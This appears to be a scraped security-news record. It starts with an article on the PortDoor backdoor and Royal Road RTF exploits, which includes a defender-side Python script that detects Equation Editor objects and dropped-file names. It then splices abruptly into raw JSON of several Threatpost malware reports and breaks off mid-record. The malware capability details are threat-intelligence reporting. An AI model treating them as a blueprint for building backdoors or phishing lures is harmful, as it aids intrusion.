A threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces.
The phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous "Royal Road" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed "**PortDoor**," according to Cybereason's Nocturnus threat intelligence team.
"Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more," the researchers [said](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>) in a write-up on Friday.
Rubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over [85% of submarines](<https://ckb-rubin.ru/en/company_profile/>) in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines.
Figure: Content of the weaponized RTF document
Over the years, Royal Road has earned its place as a [tool of choice](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>) among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. The weaponizer is known for exploiting multiple flaws in Microsoft's [Equation Editor](<https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018>) (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, and the attacks take the form of targeted spear-phishing campaigns that use malicious RTF documents to deliver custom malware to unsuspecting high-value targets.
This newly discovered attack is no different: the adversary used a spear-phishing email addressed to the submarine design firm as the initial infection vector. The email carries a malware-laced document which, when opened, drops an encoded file called "e.o" that in turn fetches the PortDoor implant. Previous versions of Royal Road were found to drop their encoded payload under the name "8.t," so the new file name implies a new variant of the weaponizer is in use.
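As an added, defender-side example (not from the article or from Cybereason's write-up): a small Python triage script that walks the embedded OLE objects of an RTF file and flags the two traits the article attributes to Royal Road documents, an Equation Editor object (the CVE-2017-11882 family) and a Package object whose payload names the dropped file `8.t` or `e.o`. The sample RTF, the NUL-terminated ANSI filename layout assumed for the Package stream, and the marker list are constructed assumptions, not indicators taken from a real sample.

```python
import re

# Dropped-file names the article reports for Royal Road variants
# (assumed to appear NUL-terminated inside the OLE Package stream).
DROPPED_FILE_MARKERS = (b"8.t", b"e.o")

# Constructed sample RTF (not from the campaign): one Equation Editor object
# and one Package object whose decoded bytes name the dropped file "e.o".
SAMPLE_RTF = (
    r"{\rtf1\ansi "
    r"{\object\objemb{\*\objclass Equation.3}"
    r"{\*\objdata d0cf11e0a1b11ae1000000}}"
    r"{\object\objemb{\*\objclass Package}"
    r"{\*\objdata 0200000000000000652e6f00433a5c54656d705c652e6f00}}"
    r"}"
)


def iter_object_groups(rtf: str):
    """Yield the text of every {\\object ...} group, matching braces and
    skipping backslash-escaped characters such as \\{ and \\}."""
    for m in re.finditer(r"\{\\object\b", rtf):
        i, depth = m.start(), 0
        while i < len(rtf):
            c = rtf[i]
            if c == "\\":
                i += 2          # skip the control character that follows
                continue
            if c == "{":
                depth += 1
            elif c == "}":
                depth -= 1
                if depth == 0:
                    yield rtf[m.start():i + 1]
                    break
            i += 1


def parse_object(group: str) -> dict:
    """Return the object's class name and its decoded \\objdata bytes.
    Binary (\\bin) object data is not handled by this example."""
    cls = re.search(r"\\objclass\s+([^\\{}\s]+)", group)
    data = re.search(r"\\objdata\s*([0-9a-fA-F\s]+)", group)
    raw = b""
    if data:
        hexstr = re.sub(r"\s+", "", data.group(1))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]   # ignore a dangling nibble
        raw = bytes.fromhex(hexstr)
    return {"objclass": cls.group(1) if cls else "", "data": raw}


def triage_rtf(rtf: str) -> list:
    """Return a list of finding strings for the Royal Road traits found."""
    findings = []
    for group in iter_object_groups(rtf):
        obj = parse_object(group)
        cls = obj["objclass"].lower()
        if cls.startswith("equation"):
            # Equation Editor objects are the carrier for the CVE-2017-11882
            # family of exploits the article lists.
            findings.append("equation-editor-object:" + obj["objclass"])
        if cls == "package":
            for marker in DROPPED_FILE_MARKERS:
                # Name must be NUL-terminated and start a path component,
                # so "site.org" does not trip the "e.o" marker.
                pattern = rb"(?:^|[\\\x00])" + re.escape(marker) + rb"\x00"
                if re.search(pattern, obj["data"]):
                    findings.append("royalroad-dropped-name:" + marker.decode())
    return findings


if __name__ == "__main__":
    print(triage_rtf(SAMPLE_RTF))
```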
Said to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server.
"The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests," the researchers said.
"THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-11882", "epss": "0.974500000", "percentile": "0.998980000", "modified": "2023-03-16"}, {"cve": "CVE-2018-0798", "epss": "0.970080000", "percentile": "0.995390000", "modified": "2023-03-17"}, {"cve": "CVE-2018-0802", "epss": "0.974870000", "percentile": "0.999420000", "modified": "2023-03-16"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1660032824, "score": 1660035404, "epss": 1679070268}, "_internal": {"score_hash": "a24f44ce104fed0cdbab01397cdba896"}}
{"threatpost": [{"lastseen": "2021-06-07T19:08:25", "description": "An ongoing surveillance operation has been uncovered that targets a Southeast Asian government, researchers said \u2013 using a previously unknown espionage malware.\n\nAccording to Check Point Research, the attack involves spear-phishing emails with malicious Word documents to gain initial access, along with the exploitation of older, known Microsoft Office security vulnerabilities. But most notable, researchers said, is the novel backdoor, which they said has been in development by a Chinese APT for at least three years.\n\nThe documents were \u201csent to different employees of a government entity in Southeast Asia,\u201d according to [the Check Point analysis](<https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/>). \u201cIn some cases, the emails are spoofed to look like they were from other government-related entities. The attachments to these emails are weaponized copies of legitimate looking official documents and use the remote template technique to pull the next stage from the attacker\u2019s server.\u201d\n\nThe malicious documents download a template from various URLs, according to the analysis, which are .RTF files embedded with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder. 
RoyalRoad is a tool that researchers have said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428; it generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe RoyalRoad-generated RTF document contains an encrypted payload and shellcode, according to the analysis.\n\n\u201cTo decrypt the payload from the package, the attacker uses the RC4 algorithm with the key 123456, and the resulting DLL file is saved as 5.t in the %Temp% folder,\u201d researchers said. \u201cThe shellcode is also responsible for the persistence mechanism \u2013 it creates the scheduled task named Windows Update that should run the exported function StartW from 5.t with rundll32.exe, once a day.\u201d\n\nThe .DLL gathers data on the victim\u2019s computer including the OS name and version, user name, MAC addresses of networking adapters and antivirus information. All of the data is encrypted and then sent to the attackers\u2019 command-and-control server (C2) via an HTTP [GET request](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>). After that, a multi-stage chain eventually results in the installation of the backdoor module, which is called \u201cVictory.\u201d It \u201cappears to be a custom and unique malware,\u201d according to Check Point.\n\n## **Victory Backdoor**\n\nThe malware is built to steal information and provide consistent access to the victim. 
Check Point researchers said it can take screenshots, manipulate files (including creating, deleting, renaming and reading them), gather information on the top-level windows that are open, and shut down the computer.\n\nInterestingly, the malware appears to be related to previously developed tools.\n\n\u201cSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to VirusTotal in 2018,\u201d according to the analysis. \u201cThe files were named by the author as MClient and appear to be part of a project internally called SharpM, according to their PDB paths. Compilation timestamps also show a similar timeframe between July 2017 and June 2018, and upon examination of the files, they were found to be older test versions of our VictoryDll backdoor and its loaders chain.\u201d\n\nThe specific implementation of the main backdoor functionality is identical, and the connection method has the same format, according to the firm. Also, MClient\u2019s connection XOR key and VictoryDll\u2019s initial XOR key are the same.\n\nHowever, there are differences between the two in terms of architecture, functionality and naming conventions. For instance, MClient features a keylogger, which is absent from Victory. And Victory\u2019s exported function is named MainThread, while in all versions of the MClient variant the export function was named GetCPUID, according to Check Point.\n\n\u201cOverall, we can see that in these three years, most of the functionality of MClient and AutoStartup_DLL was preserved and split between multiple components \u2013 probably to complicate the analysis and decrease the detection rates at each stage,\u201d the firm said. \u201cWe may also assume that there exist other modules based on the code from 2018 that might be installed by the attacker in the later stages of the attack.\u201d\n\n## **Attribution**\n\nCheck Point has attributed the campaign to a Chinese APT. 
One of the clues is that the first-stage C2 servers are hosted by two different cloud services, located in Hong Kong and Malaysia. These are active in only a limited daily window, returning payloads only from 01:00 \u2013 08:00 UTC Monday through Friday, which corresponds with the Chinese workday. Also, Check Point said that the servers went dormant in the period between May 1 and 5 \u2013 which coincides with China\u2019s Labor Day holidays.\n\nOn top of that, the RoyalRoad RTF exploit building kit is a tool of choice among Chinese APT groups, and some test versions of the backdoor contained an internet connectivity check with www.baidu.com \u2013 a popular Chinese website.\n\n\u201cWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under the radar for more than three years,\u201d Check Point concluded. \u201cIn this campaign, the attackers utilized the set of Microsoft Office exploits and loaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\u201d\n", "cvss3": {}, "published": "2021-06-07T18:49:44", "type": "threatpost", "title": "Novel 'Victory' Backdoor Spotted in Chinese APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-06-07T18:49:44", "id": "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "href": "https://threatpost.com/victory-backdoor-apt-campaign/166700/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2021-04-30T19:38:25", "description": "A previously undocumented backdoor malware, dubbed PortDoor, is being used by a probable Chinese advanced persistent threat actor (APT) to target the Russian defense sector, according to researchers.\n\nThe Cybereason Nocturnus Team observed the cybercriminals specifically going after the Rubin Design Bureau, which designs submarines for the Russian Federation\u2019s Navy. 
The initial target of the attack was a general director there named Igor Vladimirovich, researchers said, who received a phishing email.\n\nThe attack began with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder \u2013 a tool that Cybereason said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428. 
RoyalRoad generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe use of RoyalRoad is one of the reasons the company believes Chinese cybercriminals to be behind the attack.\n\n\u201cThe accumulated evidence, such as the infection vector, social-engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware, all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\u201d according to a [Cybereason analysis](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>), published Friday.\n\n## **A Quiet Espionage Malware**\n\nThe RoyalRoad tool was seen fetching the unique PortDoor sample once the malicious RTF document is opened, which researchers said was designed with stealth in mind. It has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more.\n\nOnce executed, the backdoor decrypts the strings using a hardcoded 0xfe XOR key in order to retrieve its configuration information. 
This includes the command-and-control (C2) server address, a victim identifier and some other minor information.\n\nThe malware then creates an additional file in %temp% with the hardcoded name \u201c58097616.tmp\u201d and writes the GetTickCount value multiplied by a random number to it: \u201cThis can be used as an additional identifier for the target, and also as a placeholder for the previous presence of this malware,\u201d researchers explained.\n\nAfter that, it establishes its C2 connection, which facilitates the transfer of data using TCP over raw sockets, or via HTTPS \u2013 with proxy support. At this point, Cybereason said that PortDoor also has the ability to achieve privilege escalation by stealing explorer.exe tokens.\n\nThen, the malware gathers basic PC info to be sent to the C2, which it bundles with a unique identifier, after which it awaits further instructions.\n\nThe C2 commands are myriad:\n\n * List running processes\n * Open process\n * Get free space in logical drives\n * File enumeration\n * Delete file\n * Move file\n * Create process with a hidden window\n * Open file for simultaneous operations\n * Write to file\n * Close handle\n * Open file and write directly to disk\n * Look for the \u201cKr*^j4\u201d string\n * Create pipe, copy data from it and AES encrypt\n * Write data to file, append with \u201c\\n\u201d\n * Write data to file, append with \u201cexit\\n\u201d\n\nPortDoor also employs an anti-analysis technique known as dynamic API resolving, according to the analysis.\n\n\u201cThe backdoor is able to hide most of its main functionality and avoid static detection of suspicious API calls by dynamically resolving its API calls instead of using static imports,\u201d researchers explained.\n\n## **Chinese APTs in the Cyberattack Mix \u2013 Probably**\n\nCybereason\u2019s analysis did not yield a specific Chinese APT actor who would likely be responsible for the attack. 
However, the researchers said they could make some educated guesses.\n\n\u201cThere are a couple of known Chinese APT groups that share quite a few similarities with the threat actor behind the new malware samples analyzed,\u201d according to the report.\n\nFor instance, the RTF file used in the attack was weaponized with RoyalRoad v7, which was previously observed being used by the Tonto Team, TA428 and Rancor APTs.\n\n\u201cBoth the Tonto Team and TA428 threat actors have been observed attacking Russian organizations in the past, and more specifically attacking research and defense-related targets,\u201d according to the analysis. \u201cWhen comparing the spear-phishing email and malicious documents in these attacks with previously examined phishing emails and lure documents used by the Tonto Team to attack Russian organizations, there are certain similarities in the linguistic and visual style used by the attackers in the phishing emails and documents.\u201d\n\nThat said, the PortDoor malware doesn\u2019t share significant code similarities with previously known malware used by those groups \u2013 leading Cybereason to conclude that it is not a variant of a known malware, which makes it useless in attribution efforts.\n\n\u201cLastly, we are also aware that there could be other groups, known or yet unknown, that could be behind the attack and the development of the PortDoor backdoor,\u201d researchers concluded. \u201cWe hope that as time goes by, and with more evidence gathered, the attribution could be more concrete.\u201d\n", "cvss3": {}, "published": "2021-04-30T19:32:34", "type": "threatpost", "title": "PortDoor Espionage Malware Takes Aim at Russian Defense Sector", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-04-30T19:32:34", "id": "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "href": "https://threatpost.com/portdoor-espionage-malware-takes-aim-at-russian-defense-sector/165770/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group first burst onto the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. Researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on targets\u2019 computers. 
Researchers discovered the backdoor to be loaded with malicious functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, its capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. 
This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. 
EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:20", "description": "Despite the high-profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite the arrest earlier this year of a key member, the Cobalt Group remains active.\n * A new version of the ThreadKit malware was being actively distributed in October 2018.\n * The CobInt trojan uses an XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In a single campaign, it was credited with stealing over $32,000 from six Eastern Europe ATMs. 
In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technologies](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear-phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0**\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)), notably including [the now-patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. 
As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing an RTF Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into its own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out that the update includes a new download URL from which the malware code \u201cobjects\u201d are downloaded and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills**\n\nThe ThreadKit payload is the trojan CobInt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, an XOR routine used to decode the initial CobInt payload. An XOR cipher is a simple symmetric scheme: because XOR is its own inverse, applying the same key a second time reverses the operation, so encryption and decryption are performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. 
So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt Group members has only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-20T13:38:19", "description": "An APT described as a \u201clone wolf\u201d is exploiting a decades-old Microsoft Office flaw to deliver a barrage of commodity RATs to organizations in India and Afghanistan, researchers have found.\n\nAttackers use political and government-themed malicious domains as lures in the campaign, which targets Windows and mobile devices with out-of-the-box RATs such as dcRAT and [QuasarRAT](<https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/>) for Windows, and AndroidRAT. 
They\u2019re delivering the RATs in malicious documents by exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2017-11882>), according to a [report published Tuesday](<https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) by Cisco Talos. \n\nThe threat group \u2013 tracked by Cisco Talos from the beginning of the year through the summer \u2013 disguises itself behind a front that seems legitimate, posing as a Pakistani IT firm called Bunse Technologies, researchers said.\n\nCVE-2017-11882 is a more than 20-year-old memory corruption vulnerability in Microsoft Office that persisted for 17 years before the company [patched it](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017. However, as recently [as two years ago](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>), attackers were seen exploiting the bug, which allows them to run malicious code automatically without requiring user interaction.\n\nThe advanced persistent threat (APT) behind the campaign also uses a custom file enumerator and infector in the reconnaissance phase of the two-step attack, followed by a second phase added in later versions of the campaign that deploys the ultimate RAT payload, researchers said.\n\nTo host the malware payloads, the threat actor registered multiple domains with political and government themes used to fool victims, particularly ones linked to diplomatic and humanitarian efforts in Afghanistan to target entities in that country, researchers said.\n\n\u201cThis campaign is a classic example of an individual threat actor employing political, humanitarian and diplomatic themes in a campaign to deliver commodity malware to victims\u201d \u2013 in this case, RATs \u201cpacked with multiple functionalities to achieve complete control over the 
victim\u2019s endpoint,\u201d Cisco Talos\u2019 Asheer Malhotra wrote in the post. \n\n## **Out-of-the-Box Benefits**\n\nThe campaign reflects an increased trend by both cybercriminals and APTs to use commodity RATs instead of custom malware against victims for a number of reasons, researchers said.\n\nUsing commodity RATs gives attackers a range of out-of-the-box functionality, including preliminary reconnaissance capabilities, arbitrary command execution and data exfiltration, researchers noted. The RATs also \u201cact as excellent launch pads for deploying additional malware against their victims,\u201d Malhotra wrote.\n\nUsing commodity malware also saves attackers both the time and resource investment in developing custom malware, as the RATs have stock features requiring minimal configuration changes, researchers said.\n\nIn their post, researchers broke down the two-stage attack process as well as the specifics of each RAT they observed attackers using in the campaign. RAT functionality varies depending on the payload, they said, but generally includes capabilities such as remote shells, process management, file management, keylogging, arbitrary command execution and credential stealing.\n\n## **Initial Infection and Reconnaissance**\n\nThe infection chain consists of a reconnaissance phase that starts with malicious RTF documents and PowerShell scripts that ultimately distribute malware to victims. \n\nSpecifically, the threat actor uses the RTF to exploit the Office bug and execute a malicious PowerShell command that extracts and executes the next-stage PowerShell script. That script then base64 decodes another payload \u2013 in the case researchers observed, it was a loader executable \u2013 and activates it on the infected endpoint, Malhotra wrote.\n\nThe loader executable begins by establishing persistence for itself using a shortcut in the current user\u2019s Startup directory and then compiles hardcoded C# code into an executable assembly. 
It then invokes the entry point for the compiled malicious code \u2013 the previously mentioned custom file enumerator and infector \u2013 researchers found.\n\nThis C# code \u2013 which is the final payload in the reconnaissance phase \u2013 contains the file enumerator, which lists specific file types on the endpoint and sends the file paths to the command-and-control (C2) server along with file infector modules, which are different than typical executable infectors usually seen in the wild, Malhotra noted.\n\n\u201cThese modules are used for infecting benign Office documents with malicious OLE objects to weaponize them to exploit CVE-2017-11882,\u201d he wrote.\n\n## **Attack Phase**\n\nResearchers observed attackers switching up tactics to deploy commodity RATs as the final payload starting in July, they said. \n\nTo do this, attackers tweaked the reconnaissance process slightly to leverage the second-stage PowerShell script to create a BAT file on disk, researchers said. That file, in turn, would execute another PowerShell command to download and activate the RAT payload on the infected endpoint, retrieving it from one of the sites attackers set up. 
\n\u201cSo far, we\u2019ve observed the delivery of three types of payloads from the remote locations discovered in this phase of the campaign: DcRAT, QuasarRAT and a legitimate copy of the remote desktop client AnyDesk,\u201d Malhotra wrote.\n\nThe use of the last payload \u201cindicates a focus on manual operations where the actor would have logged into the infected devices to discern if the access was of any value,\u201d according to the writeup.\n\nAll in all, the tactics of the APT used in the campaign demonstrate \u201caggressive proliferation\u201d as the goal, as the use of out-of-the-box malware combined with customized file infections gives them a straightforward point of entry onto a victim\u2019s network, Malhotra observed.\n\n\u201cOrganizations should remain vigilant against such threats that are highly motivated to proliferate using automated mechanisms,\u201d he wrote.\n\nHowever, it seems likely that the group will eventually abandon its use of commodity malware for its own bespoke tools, which means there will probably be more threat campaigns in its future, researchers said.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-20T13:28:13", "type": "threatpost", "title": 